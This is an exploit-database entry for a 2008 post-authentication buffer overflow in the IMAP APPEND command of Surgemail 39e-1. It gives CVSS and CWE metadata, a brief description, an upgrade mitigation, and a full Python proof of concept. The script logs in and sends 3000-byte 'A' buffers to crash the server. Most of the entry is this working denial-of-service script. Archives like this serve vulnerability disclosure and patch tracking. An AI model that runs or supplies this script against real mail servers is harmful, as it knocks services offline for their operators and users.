header-logo
Suggest Exploit
vendor:
Surgemail
by:
Travis Warren
7.5
CVSS
HIGH
Buffer overflow
119
CWE
Product Name: Surgemail
Affected Version From: 3.90E+00
Affected Version To: 3.90E+00
Patch Exists: YES
Related CWE: N/A
CPE: //a:surgemail:surgemail:39e-1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Surgemail version 39e-1 – (0day) Post Auth IMAP Buffer overflow DoS

The IMAP service contains a buffer overflow in the APPEND command. An attacker can send a specially crafted IMAP command with an overly long string to the vulnerable server, causing a denial of service.

Mitigation:

Upgrade to the latest version of Surgemail.
Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Surgemail version 39e-1 - (0day) Post Auth IMAP Buffer overflow DoS.
# Discovered by: Travis Warren
# 
# The IMAP service contains a buffer overflow in the APPEND command. 
# 
#


import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = '\x41' * 3000

s.connect(('192.168.0.103',143))
s.recv(1024)
s.send('A001 LOGIN user@test.com user ' + buffer + '\r\n')
s.recv(1024)
s.send('A001 APPEND ' + buffer + '\r\n')
s.recv(1024)
s.close()

# milw0rm.com [2008-06-30]